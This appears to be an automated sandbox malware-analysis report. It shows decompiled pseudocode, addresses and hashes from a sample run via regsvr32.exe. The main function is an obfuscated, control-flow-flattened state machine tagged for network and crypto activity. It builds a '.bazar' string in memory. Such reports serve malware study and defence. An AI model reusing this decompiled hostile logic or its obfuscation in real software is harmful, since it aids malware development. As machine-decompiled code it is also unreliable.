				_t23 = GetDateFormatW(??, ??, ??, ??, ??, ??); // executed
				return _t23;
			}














                                                                                                                                                        0x00a1c450
                                                                                                                                                        0x00a1c457
                                                                                                                                                        0x00a1c463
                                                                                                                                                        0x00a1c469
                                                                                                                                                        0x00a1c46f
                                                                                                                                                        0x00a1c474
                                                                                                                                                        0x00a1c479
                                                                                                                                                        0x00a1c47b
                                                                                                                                                        0x00a1c480
                                                                                                                                                        0x00a1c488
                                                                                                                                                        0x00a1c48a
                                                                                                                                                        0x00a1c48d
                                                                                                                                                        0x00a1c494
                                                                                                                                                        0x00a1c49b
                                                                                                                                                        0x00a1c4a2
                                                                                                                                                        0x00a1c4ac
                                                                                                                                                        0x00a1c4b5
                                                                                                                                                        0x00a1c4cb
                                                                                                                                                        0x00a1c4cf
                                                                                                                                                        0x00a1c4d2
                                                                                                                                                        0x00a1c4d5
                                                                                                                                                        0x00a1c4b5
                                                                                                                                                        0x00a1c4e2
                                                                                                                                                        0x00a1c4e8
                                                                                                                                                        0x00a1c4ee
                                                                                                                                                        0x00a1c4f3
                                                                                                                                                        0x00a1c4f8
                                                                                                                                                        0x00a1c50f
                                                                                                                                                        0x00a1c519

                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000019.00000002.634304009.0000000000A11000.00000020.00000001.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                        • Associated: 00000019.00000002.634295050.0000000000A10000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634331329.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000019.00000002.634341347.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: DateFormat
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2793631785-0
                                                                                                                                                        • Opcode ID: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction ID: 840bc468ba258a50d8a99588e84cfab0db76049b6a49bebd7b7ec5733fc907e5
                                                                                                                                                        • Opcode Fuzzy Hash: 50378c0f2bcc1f64eda8536ac104d2ffe73bbeeb79143c7527775f7fd14e6f08
                                                                                                                                                        • Instruction Fuzzy Hash: 6E1123B23182848BE718DF15F300A9EAA50F7A4344F04C139DB4947B44CB38D5A28B00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Analysis Process: regsvr32.exe PID: 6824 Parent PID: 6896 regsvr32.exeCOMMON

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00FD6537, Relevance: 20.3, APIs: 1, Strings: 10, Instructions: 1095networkCOMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                        			E00FD6537(void* __edx, unsigned long long __rcx, signed long long __rdx, long long __r9, void* __r11) {
				intOrPtr _v464;
				char _v468;
				char _v472;
				signed long long _v480;
				long long _v488;
				void* _v496;
				void* _v504;
				unsigned int* _v512;
				signed long long _v520;
				signed long long _v528;
				void* _v536;
				void* _v544;
				long long _v552;
				void* _v560;
				void* _v568;
				void* _v576;
				long long _v584;
				void* _v592;
				void* _v600;
				void* _v608;
				intOrPtr _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v632;
				long long _v640;
				void* _v648;
				void* _v656;
				void* _v664;
				signed long long _v672;
				void* _v680;
				void* _v688;
				void* _v696;
				void* _v704;
				void* _v712;
				unsigned long long _v720;
				signed long long _v728;
				signed long long _v736;
				void* _v744;
				void* _v752;
				void* _v760;
				signed int _v764;
				long long _v768;
				intOrPtr _v772;
				unsigned int _v776;
				intOrPtr _v780;
				char _v784;
				char _v788;
				signed int _v792;
				signed int _v796;
				intOrPtr _v800;
				intOrPtr _v804;
				char _v808;
				signed long long _v816;
				intOrPtr _v817;
				char _v821;
				signed int _v832;
				unsigned int* _v840;
				signed int _v844;
				signed int _v848;
				intOrPtr _v852;
				intOrPtr _v856;
				signed long long _v860;
				intOrPtr _v864;
				unsigned int _v868;
				unsigned long long _v872;
				char _v873;
				char _v875;
				void* _v888;
				signed short _v890;
				short _v892;
				void* _v904;
				unsigned int _v905;
				char _v906;
				char _v907;
				char _v908;
				char _v909;
				intOrPtr _v928;
				signed long long _v936;
				signed int _t368;
				signed int _t417;
				signed long long _t450;
				void* _t473;
				void* _t497;
				signed int _t503;
				signed int _t532;
				signed int _t572;
				unsigned int _t596;
				signed int _t600;
				unsigned long long _t632;
				signed long long _t640;
				short* _t644;
				signed long long _t706;
				unsigned long long _t707;
				signed long long _t721;
				void* _t723;
				void* _t726;

				_t726 = __r11;
				_t725 = __r9;
				_t721 = __rdx;
				_t707 = __rcx;
				_t723 =  &_v904;
				_v568 = __r9;
				_v906 = r8b;
				_v696 = __rcx + 0xc;
				_v576 = __rcx + 0x218;
				_v584 = __rcx + 0x10;
				_t600 =  !=  ? 0xf8d80d50 : 0xf3bb400e;
				r15d = 0x5d3f2d89;
				_t363 =  !=  ? r15d : 0xf8c794ac;
				_v612 =  !=  ? r15d : 0xf8c794ac;
				r15d =  ==  ? 0xa6dbf53a : r15d;
				_t603 =  <  ? 0x902c474f : 0x4721b862;
				_v616 =  <  ? 0x902c474f : 0x4721b862;
				_t605 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v620 =  <  ? 0xa6dbf53a : 0xfdcb4e26;
				_v592 = __rcx + 0x240;
				_t589 =  ==  ? 0x4591200e : 0x727b8f2a;
				_v624 =  ==  ? 0x4591200e : 0x727b8f2a;
				r13d = 0xe84fe95c;
				r13d =  <  ? 0x1cfee6ca : r13d;
				r14d = 0x87afab9e;
				r14d =  <=  ? 0x7ff9f897 : r14d;
				_v600 = __rcx + 0x238;
				_v704 = __rcx + 0x24c;
				_v608 = __rcx + 0x248;
				_v752 = __rcx + 0x254;
				_v760 = __rcx + 8;
				_v488 = __rcx + 0x259;
				_v904 = __rcx;
				_t632 = __rcx + 0x258;
				_v712 = _t632;
				_v868 = 0x7ff9f897;
				_v728 = _t632;
				_v720 = _t632;
				_t368 = 0xa26d3c93;
				while(1) {
					_t503 = _t368;
					if(_t368 <= 0x12c2784) {
					}
					L2:
					if(_t503 > 0xad7f3ccf) {
						if(_t503 > 0xd55faea1) {
							if(_t503 <= 0xeee9c934) {
								if(_t503 <= 0xe84fe95b) {
									if(_t503 == 0xd55faea2) {
										_t368 =  ==  ? 0x873106d2 : 0xa4415a4b;
									} else {
										_t368 = _t503;
										if(_t503 == 0xd97c734e) {
											_t707 = _v872;
											 *((char*)(_t723 + _t707 + 0x93)) =  *((intOrPtr*)(_v736 + _t640));
											_v800 = _v872 + 1;
											_t368 = 0x62146214;
										}
									}
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe84fe95c) {
									_t707 = _v904;
									 *((char*)(_t707 + 0x258)) = _v906;
									 *((intOrPtr*)(_t707 + 0x250)) = 0;
									 *((intOrPtr*)(_t707 + 8)) = 0;
									 *((long long*)(_t707 + 0x248)) = 1;
									_t368 = 0xc538f3c7;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L2;
									}
								}
								if(_t503 == 0xe87f8cad) {
									_v909 = _v868;
									_t368 =  ==  ? 0xa1550a50 : 0x83ffe87a;
									while(1) {
										_t503 = _t368;
										if(_t368 <= 0x12c2784) {
										}
										goto L10;
									}
									goto L2;
								}
								_t368 = _t503;
								if(_t503 == 0xeec8a184) {
									_t640 = _v568;
									_t707 = _v904;
									 *_t707 = _t640;
									L143:
									_t368 = 0xc538f3c7;
								}
								continue;
							} else {
								if(_t503 > 0xf8d80d4f) {
									if(_t503 == 0xf8d80d50) {
										_t721 = _v760;
										_t334 = _t640 + 1; // 0xc3c975e0
										 *_t721 = _t334;
										_t640 = _v696;
										_v816 = _t640;
										_t368 =  <  ? 0x6c161dc6 : 0x6e65093f;
									} else {
										if(_t503 == 0xfa2adb82) {
											_t707 = _v640;
											_t721 = _v496;
											_t368 =  ==  ? 0x9cc1af46 : 0x90031297;
										} else {
											_t368 = _t503;
											if(_t503 == 0xfdcb4e26) {
												_t368 = _v616;
											}
										}
									}
								} else {
									if(_t503 == 0xeee9c935) {
										_t596 = 4;
										r8d = 0x8955631f;
										r9d = 0x189;
										E00FDFAD7(4, _t600, _t640, _t707);
										_t721 =  &_v472;
										 *_t640(); // executed
										_t640 = _v544;
										 *_t640 = 1;
										_t368 = 0x97ba314b;
									} else {
										if(_t503 == 0xf3bb400e) {
											_t640 = _v608;
											_t368 =  ==  ? 0x82b867c6 : 0x74e12cd6;
										} else {
											_t368 = _t503;
											if(_t503 == 0xf8c794ac) {
												 *_v712 = 0;
												 *_v760 = 0;
												 *_v752 = 0;
												_t640 = _v568;
												_t368 =  ==  ? 0x75019ba8 : 0xeec8a184;
											}
										}
									}
								}
								while(1) {
									_t503 = _t368;
									if(_t368 <= 0x12c2784) {
									}
									goto L2;
								}
							}
						}
						if(_t503 <= 0xc1df8fb4) {
							if(_t503 <= 0xb4b38c1e) {
								if(_t503 == 0xad7f3cd0) {
									_t450 = E00FDC51A(_t707);
									_t721 = _t450;
									_t640 = _t721 * 0xf2b9d649 >> 0x20;
									_t596 = _t596 - ((_t450 + _t596 >> 0xb) + (_t450 + _t596 >> 0x1f)) * 0x870;
									_v728 = _t721;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0xb1cd874d) {
										 *_v752 = 0;
										_t640 = _v552;
										 *_t640 = 0;
										_t368 = 0xa574e944;
									}
								}
							} else {
								if(_t503 == 0xb4b38c1f) {
									 *_v840 = 2;
									 *_v744 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00FDFAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xd55faea2;
								} else {
									if(_t503 == 0xb75c2336) {
										_v680 = _v704;
										_t640 = _v680;
										_t368 =  ==  ? 0x95091900 : 0x34ddbdbe;
									} else {
										_t368 = _t503;
										if(_t503 == 0xc04800cb) {
											_t368 =  ==  ? 0x1bd2d9df : 0x514370c2;
											_v908 = _v909;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xc4b668ea) {
							if(_t503 == 0xc4b668eb) {
								_t721 = _v904;
								 *_t721 =  *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _t707 * 8));
								_t640 = _v744;
								_t707 = _v744;
								 *_t707 =  *_t640 + 1;
								L198:
								_t368 = 0x53bce5ed;
								r12b = 1;
								continue;
							}
							if(_t503 == 0xc538f3c7) {
								_v905 = bpl;
								_t368 = _v624;
							} else {
								_t368 = _t503;
								if(_t503 == 0xc6fd976d) {
									 *_v840 = 3;
									 *_v528 = 0;
									_t640 = _v904;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00FDFAD7(1, _t600, _t640, _t707);
									 *_t640();
									_t368 = 0xa4415a4b;
								}
							}
						} else {
							if(_t503 == 0xc1df8fb5) {
								_v796 = 0;
								_t368 = 0x8c01f6ea;
							} else {
								if(_t503 == 0xc2927316) {
									E00FDCDB9(0x21c0, _t640);
									_v520 = _t640;
									_t640 = _v520;
									_v480 = _t640;
									_t368 = 0xea11413;
									_v808 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0xc3c975df) {
										_t640 = _v816;
										_t368 =  >  ? 0xa67110d8 : 0xc538f3c7;
									}
								}
							}
						}
						continue;
					}
					if(_t503 > 0x97ba314a) {
						if(_t503 <= 0xa4415a4a) {
							if(_t503 <= 0xa1550a4f) {
								if(_t503 == 0x97ba314b) {
									L178:
									_t368 = 0x94958caf;
									continue;
								}
								_t368 = _t503;
								if(_t503 == 0x9cc1af46) {
									_v788 = _v768 + 1;
									_t368 = 0x782ba57;
								}
							} else {
								if(_t503 == 0xa1550a50) {
									_v784 = 0;
									_t368 = 0xc04800cb;
								} else {
									_t368 = r14d;
									if(_t503 != 0xa26d3c93) {
										_t368 = _t503;
										if(_t503 == 0xa32a0313) {
											 *_v760 = 0;
											_v544 = _v488;
											_t640 = _v544;
											_t368 =  ==  ? 0xeee9c935 : 0x97ba314b;
										}
									}
								}
							}
							continue;
						}
						if(_t503 > 0xa6dbf539) {
							_t368 = _t600;
							if(_t503 == 0xa6dbf53a) {
								continue;
							}
							if(_t503 == 0xaaa69421) {
								E00FDCDB9(0x26, _t640);
								_t707 =  *_v888;
								 *(_t707 + _t721 * 8) = _t640;
								_v804 = _v856 + 1;
								_t368 = 0x4a668043;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0xad742835) {
								continue;
							}
							_t598 = r15d;
							r15d = r12d;
							r13d = _t600;
							r12d = r14d;
							r14d = r13d;
							_v817 = sil;
							_t497 = E00FDC55D(_t640,  &_v821) + 0xffffffee;
							_t473 = E00FDC55D(_t640,  &_v875);
							r8d = 0xc;
							r8d = r8d - _t473;
							_v472 = sil;
							_v468 = 0x3453b36b;
							_v464 = 0x5061f96b;
							if(_v472 != sil) {
								L118:
								_t707 = _v672;
								_t721 =  &_v468;
								r9d = _t497;
								E00FE020E(_t640, _t707, _t721, _t724, _t725);
								_v648 = _v600;
								 *_v648 = 0x870;
								_v888 = _v592;
								_t640 = _v888;
								_t368 =  ==  ? 0x2ccb8bda : 0xc2927316;
								r14d = r12d;
								_t600 = r13d;
								r13d = r14d;
								r12d = r15d;
								r15d = _t598;
								continue;
							}
							do {
								_t572 =  *(_t723 + 0x1f4 + _t640 * 4);
								_t596 =  !_t572 & 0x50619d4e;
								 *(_t723 + 0x1f4 + _t640 * 4) = _t572 & 0xaf9e62b1 | _t596;
							} while (_t640 == 0);
							goto L118;
						}
						if(_t503 == 0xa4415a4b) {
							_t640 = _v840;
							_t368 =  ==  ? 0xb75c2336 : 0x280f3889;
							continue;
						}
						if(_t503 == 0xa574e944) {
							L38:
							_t368 = 0xc538f3c7;
							bpl = 1;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0xa67110d8) {
							continue;
						} else {
							 *_v752 = 0;
							_t640 = _v712;
							 *_t640 = 0;
							goto L38;
						}
					}
					if(_t503 > 0x8c01f6e9) {
						if(_t503 > 0x902c474e) {
							if(_t503 == 0x902c474f) {
								_v552 = _v712;
								_t368 =  ==  ? 0xa574e944 : 0xb1cd874d;
							} else {
								if(_t503 == 0x94958caf) {
									_v688 = _v752;
									_t640 = _v688;
									E00FD64D6( *_t640, _t640);
									_t368 = 0xaa8668a;
								} else {
									_t368 = _t503;
									if(_t503 == 0x95091900) {
										E00FDCDB9(7, _t640);
										_v672 = _t640;
										E00FDCDB9(0x18, _t640);
										_v736 = _t640;
										_t706 = _v736;
										_t598 = r12d;
										r12d = 0;
										r8d = 0xc87545ea;
										r9d = 0xcb;
										E00FDFAD7(1, _t600, _t640, _t707);
										_v936 = _t706;
										_v928 = 0x18;
										r8d = 0;
										r9d = 0;
										 *_t640();
										_v664 =  &_v875;
										_t644 = _v664;
										 *(_t644 + 2) = r12b;
										 *_t644 = 0;
										_v656 =  &_v821;
										_t640 = _v656;
										_v720 = _t707;
										 *(_t640 + 4) = r12b;
										 *_t640 = 0;
										_t368 = 0x844b3ff6;
									}
								}
							}
						} else {
							if(_t503 == 0x8c01f6ea) {
								_v764 = _v796;
								_v632 = _v764;
								_t640 = _v640;
								_t707 = _v632;
								_v890 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0x5903be2d : 0x5ffd86ff;
							} else {
								if(_t503 == 0x8efa67b7) {
									_t368 = 0x782ba57;
									_v788 = 0;
								} else {
									_t368 = _t503;
									if(_t503 == 0x90031297) {
										_v868 = 0;
										_t368 = 0xe87f8cad;
									}
								}
							}
						}
					} else {
						if(_t503 <= 0x844b3ff5) {
							if(_t503 == 0x82b867c6) {
								_v560 = _v760;
								_v780 =  *_v560;
								_t368 =  <  ? 0x6f81883a : 0x74e12cd6;
							} else {
								_t368 = _t503;
								if(_t503 == 0x83ffe87a) {
									_v784 = 0x13;
									_t368 = 0xc04800cb;
								}
							}
						} else {
							if(_t503 == 0x844b3ff6) {
								_t640 = _v720;
								_v860 = _t368;
								_t368 =  <  ? 0x564692ca : 0x6ecf8e8e;
							} else {
								if(_t503 == 0x873106d2) {
									_v536 = _v584;
									_t724 =  *((intOrPtr*)(_v904 + 0x230));
									_t640 = _v704;
									_v528 = _t640;
									_t725 = _v536;
									_t707 = _v528;
									E00FD6118(_t503,  *((intOrPtr*)(_v904 + 0x228)), _t598, _t707,  *((intOrPtr*)(_v904 + 0x230)), _v536);
									_t368 =  !=  ? 0x12c2785 : 0xc6fd976d;
								} else {
									_t368 = _t503;
									if(_t503 == 0x87afab9e) {
										_t368 = _v620;
									}
								}
							}
						}
					}
					continue;
					L10:
					if(_t503 > 0x514370c1) {
						if(_t503 <= 0x6745e6b6) {
							if(_t503 > 0x574d588e) {
								if(_t503 <= 0x5d3f2d88) {
									if(_t503 == 0x574d588f) {
										 *_v816 = 0x1b7740;
										_t368 = 0xc3c975df;
									} else {
										_t368 = _t503;
										if(_t503 == 0x5903be2d) {
											_t721 = _v904;
											 *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t721 + 0x220)) + _v832 * 8)) + _v632 * 2)) = 0;
											_t640 = _v832;
											_v772 =  *_t640;
											_t707 = _v832;
											 *_t707 = _v772 + 1;
											_t368 =  <  ? 0x52e2fcd6 : 0x49d13f87;
										}
									}
									continue;
								}
								if(_t503 == 0x5d3f2d89) {
									goto L143;
								} else {
									if(_t503 == 0x5ffd86ff) {
										_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v832 * 8));
										_t707 = _v632;
										_t596 = _v890 & 0x0000ffff;
										 *(_t640 + _t707 * 2) = _t596;
										_v796 = _v764 + 1;
										_t368 = 0x8c01f6ea;
									} else {
										_t368 = _t503;
										if(_t503 == 0x62146214) {
											_v872 = _v800;
											_t368 =  <  ? 0xd97c734e : 0xad742835;
										}
									}
									continue;
								}
							}
							if(_t503 <= 0x53bce5ec) {
								if(_t503 == 0x514370c2) {
									_t368 =  ==  ? 0xc1df8fb5 : 0x52e2fcd6;
									continue;
								}
								_t368 = _t503;
								if(_t503 != 0x52e2fcd6) {
									continue;
								}
								L201:
								r12b = 1;
								_t368 = 0x53bce5ed;
								continue;
							}
							if(_t503 == 0x53bce5ed) {
								r12b = r12b & 0x00000001;
								return r12d;
							} else {
								_t368 = _t503;
								if(_t503 == 0x564692ca) {
									_t640 = _v860;
									_t707 = _v736;
									 *((char*)(_t723 + _t640 + 0x5d)) =  *((intOrPtr*)(_t707 + _t640));
									_v720 = _t640;
									_t368 = 0x844b3ff6;
								}
								continue;
							}
						}
						if(_t503 <= 0x727b8f29) {
							if(_t503 <= 0x6e65093e) {
								if(_t503 == 0x6745e6b7) {
									_t640 = _v696;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00FDFAD7(1, _t600, _t640, _t707);
									 *_t640();
									goto L201;
								}
								_t368 = _t503;
								if(_t503 != 0x6c161dc6) {
									continue;
								}
								_t640 = _v816;
								L142:
								 *_t640 = 0xea60;
								goto L143;
							}
							if(_t503 == 0x6e65093f) {
								_v864 =  *_v816 +  *_v816;
								_t640 = _v816;
								 *_t640 = _v864;
								_t368 =  >  ? 0x9213403 : 0xc3c975df;
								continue;
							}
							if(_t503 == 0x6ecf8e8e) {
								_v873 = 0;
								_t368 = 0x62146214;
								_v800 = 0;
								continue;
							}
							_t368 = _t503;
							if(_t503 != 0x6f81883a) {
								continue;
							} else {
								_t707 = _v560;
								 *_t707 = _v780 + 1;
								_t640 = _v696;
								goto L142;
							}
						}
						if(_t503 > 0x7cdb6e3c) {
							if(_t503 == 0x7cdb6e3d) {
								E00FDCC2E(_t640, _v520);
								E00FDCC2E(_t640, _v672);
								_t707 = _v736;
								E00FDCC2E(_t640, _t707);
								_t640 = _v664;
								_t368 = 0x34ddbdbe;
							} else {
								if(_t503 == 0x7f365e09) {
									_v848 = _t368;
									_v512 = (_v848 << 2) + _v480;
									_t640 = _v512;
									_t368 =  ==  ? 0x1b18ea96 : 0x8729393;
								} else {
									_t368 = _t503;
									if(_t503 == 0x7ff9f897) {
										_t368 = r13d;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x727b8f2a) {
							_t368 =  ==  ? 0x6745e6b7 : 0xa32a0313;
							continue;
						}
						if(_t503 == 0x74e12cd6) {
							goto L38;
						}
						_t368 = _t503;
						if(_t503 != 0x75019ba8) {
							continue;
						} else {
							goto L38;
						}
					}
					if(_t503 > 0x21790be6) {
						if(_t503 <= 0x2fe22761) {
							if(_t503 <= 0x280f3888) {
								if(_t503 == 0x21790be7) {
									 *_v840 = 1;
									_t640 = _v680;
									 *_t640 = 0;
									_t596 = 1;
									r8d = 0x7e1a74f1;
									r9d = 0x2f;
									E00FDFAD7(1, _t600, _t640, _t707);
									 *_t640();
									 *((intOrPtr*)(_v904 + 0x250)) = 0x1b7740;
									_t368 = 0x280f3889;
								} else {
									_t368 = _t503;
									if(_t503 == 0x23069f92) {
										_t368 = 0x53bce5ed;
										r12d = 0;
									}
								}
								continue;
							}
							if(_t503 == 0x280f3889) {
								_t640 = _v688;
								_t707 = _v688;
								 *_t707 =  *_t640 + 1;
								goto L178;
							} else {
								if(_t503 == 0x2b3e96a7) {
									_t368 = 0xc2927316;
								} else {
									_t368 = _t503;
									if(_t503 == 0x2ccb8bda) {
										E00FDCDB9(0x4380, _t640);
										_t707 = _v888;
										 *_t707 = _t640;
										_t368 = 0x4a668043;
										_v804 = 0;
									}
								}
								continue;
							}
						}
						if(_t503 > 0x4721b861) {
							_t368 = r15d;
							if(_t503 != 0x4721b862) {
								if(_t503 == 0x49d13f87) {
									_t640 = _v832;
									 *_t640 = _v772;
									_t368 = 0x52e2fcd6;
								} else {
									_t368 = _t503;
									if(_t503 == 0x4a668043) {
										_v856 = _v804;
										_t640 = _v648;
										_t368 =  <  ? 0xaaa69421 : 0x2b3e96a7;
									}
								}
							}
							continue;
						}
						if(_t503 == 0x2fe22762) {
							_v844 = _v792;
							_v832 = _v576;
							_t640 = _v832;
							_t368 =  <  ? 0x8efa67b7 : 0x514370c2;
							_v908 = _v907;
							continue;
						}
						if(_t503 == 0x34ddbdbe) {
							_v640 = _v584;
							_v504 = _v640;
							_t724 =  *_v592;
							_t640 = _v600;
							_t596 =  *_t640;
							_t707 = _v680;
							_t725 = _v504;
							E00FD6118(_t503, _t596, _t598, _t707,  *_v592, _v504);
							_t368 =  !=  ? 0xf200fb5 : 0x21790be7;
							continue;
						}
						_t368 = _t503;
						if(_t503 != 0x4591200e) {
							continue;
						} else {
							goto L198;
						}
					}
					if(_t503 <= 0xaa86689) {
						if(_t503 <= 0x782ba56) {
							if(_t503 == 0x12c2785) {
								_t640 = _v536;
								_t707 = _v904;
								 *_t707 = _t640;
								goto L198;
							}
							_t368 = _t503;
							if(_t503 == 0x73cf00c) {
								_v744 = _v704;
								_t640 = _v744;
								_v776 =  *_t640;
								_t707 = _v576;
								_t368 =  <  ? 0xc4b668eb : 0xb4b38c1f;
							}
						} else {
							if(_t503 == 0x782ba57) {
								_v768 = _v788;
								_t640 =  *((intOrPtr*)( *((intOrPtr*)(_v904 + 0x220)) + _v844 * 8));
								_v496 = _v768;
								_t707 = _v496;
								_v892 =  *(_t640 + _t707 * 2) & 0x0000ffff;
								_t368 =  ==  ? 0xe87f8cad : 0xfa2adb82;
								_v868 = 1;
							} else {
								if(_t503 == 0x8729393) {
									_t417 = _v848;
									_t532 = _t417 + 0x3f1;
									_t707 = _t532 * 0xf2b9d649 >> 0x20;
									_t596 = _t532 + _t417 + 0x3f1 >> 0x1f;
									_v728 = _t640;
									_t368 = 0x7f365e09;
								} else {
									_t368 = _t503;
									if(_t503 == 0x9213403) {
										_t368 =  <  ? 0x574d588f : 0xc3c975df;
									}
								}
							}
						}
					} else {
						if(_t503 > 0x1b18ea95) {
							if(_t503 == 0x1b18ea96) {
								_t707 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								_t721 = _v672;
								r8d = _v848;
								E00FD5EF8( *_v888, _t707, _t721, _t724, _t726);
								 *_v512 = 1;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x18)) = 0x2e;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1a)) = 0x62;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1c)) = 0x61;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x1e)) = 0x7a;
								 *((short*)( *((intOrPtr*)( *_v888 + _t706 * 8)) + 0x20)) = 0x61;
								_t640 =  *((intOrPtr*)( *_v888 + _t706 * 8));
								 *((short*)(_t640 + 0x22)) = 0x72;
								_v808 = _v852 + 1;
								_t368 = 0xea11413;
							} else {
								if(_t503 == 0x1bd2d9df) {
									_v792 = _v844 + 1;
									_v907 = _v909;
									_t368 = 0x2fe22762;
								} else {
									_t368 = _t503;
									if(_t503 == 0x1cfee6ca) {
										_t368 = _v612;
									}
								}
							}
						} else {
							if(_t503 == 0xaa8668a) {
								_v840 = _v608;
								_t640 = _v840;
								_t368 =  ==  ? 0x73cf00c : 0xd55faea2;
							} else {
								if(_t503 == 0xea11413) {
									_v852 = _v808;
									_t640 = _v648;
									_t368 =  <  ? 0xad7f3cd0 : 0x7cdb6e3d;
								} else {
									_t368 = _t503;
									if(_t503 == 0xf200fb5) {
										_t640 = _v504;
										_t707 = _v904;
										 *_t707 = _t640;
										_t368 = 0x2fe22762;
										_v792 = 0;
									}
								}
							}
						}
					}
				}
			}




































































































                                                                                                                                                        0x00fd6537
                                                                                                                                                        0x00fd6537
                                                                                                                                                        0x00fd6537
                                                                                                                                                        0x00fd6537
                                                                                                                                                        0x00fd6543
                                                                                                                                                        0x00fd654a
                                                                                                                                                        0x00fd6552
                                                                                                                                                        0x00fd655b
                                                                                                                                                        0x00fd656a
                                                                                                                                                        0x00fd6576
                                                                                                                                                        0x00fd658b
                                                                                                                                                        0x00fd6596
                                                                                                                                                        0x00fd659c
                                                                                                                                                        0x00fd65a0
                                                                                                                                                        0x00fd65af
                                                                                                                                                        0x00fd65bd
                                                                                                                                                        0x00fd65c0
                                                                                                                                                        0x00fd65cf
                                                                                                                                                        0x00fd65d2
                                                                                                                                                        0x00fd65e0
                                                                                                                                                        0x00fd65f4
                                                                                                                                                        0x00fd65f7
                                                                                                                                                        0x00fd6603
                                                                                                                                                        0x00fd6609
                                                                                                                                                        0x00fd6612
                                                                                                                                                        0x00fd6618
                                                                                                                                                        0x00fd6623
                                                                                                                                                        0x00fd6632
                                                                                                                                                        0x00fd6641
                                                                                                                                                        0x00fd6650
                                                                                                                                                        0x00fd665c
                                                                                                                                                        0x00fd666b
                                                                                                                                                        0x00fd6673
                                                                                                                                                        0x00fd6678
                                                                                                                                                        0x00fd667f
                                                                                                                                                        0x00fd6687
                                                                                                                                                        0x00fd668b
                                                                                                                                                        0x00fd6693
                                                                                                                                                        0x00fd669b
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a9
                                                                                                                                                        0x00fd66af
                                                                                                                                                        0x00fd678b
                                                                                                                                                        0x00fd68e2
                                                                                                                                                        0x00fd6bb7
                                                                                                                                                        0x00fd7145
                                                                                                                                                        0x00fd7b08
                                                                                                                                                        0x00fd714b
                                                                                                                                                        0x00fd714b
                                                                                                                                                        0x00fd7153
                                                                                                                                                        0x00fd716d
                                                                                                                                                        0x00fd7172
                                                                                                                                                        0x00fd717f
                                                                                                                                                        0x00fd7186
                                                                                                                                                        0x00fd7186
                                                                                                                                                        0x00fd7153
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd6bc3
                                                                                                                                                        0x00fd7689
                                                                                                                                                        0x00fd768e
                                                                                                                                                        0x00fd7696
                                                                                                                                                        0x00fd769c
                                                                                                                                                        0x00fd769f
                                                                                                                                                        0x00fd76aa
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd6bcf
                                                                                                                                                        0x00fd76b8
                                                                                                                                                        0x00fd76d1
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd66a7
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd66a0
                                                                                                                                                        0x00fd6bd5
                                                                                                                                                        0x00fd6bdd
                                                                                                                                                        0x00fd6be3
                                                                                                                                                        0x00fd6beb
                                                                                                                                                        0x00fd6bf0
                                                                                                                                                        0x00fd70d8
                                                                                                                                                        0x00fd70d8
                                                                                                                                                        0x00fd70dd
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00fd68e8
                                                                                                                                                        0x00fd68ee
                                                                                                                                                        0x00fd6f9b
                                                                                                                                                        0x00fd795b
                                                                                                                                                        0x00fd7965
                                                                                                                                                        0x00fd7968
                                                                                                                                                        0x00fd796d
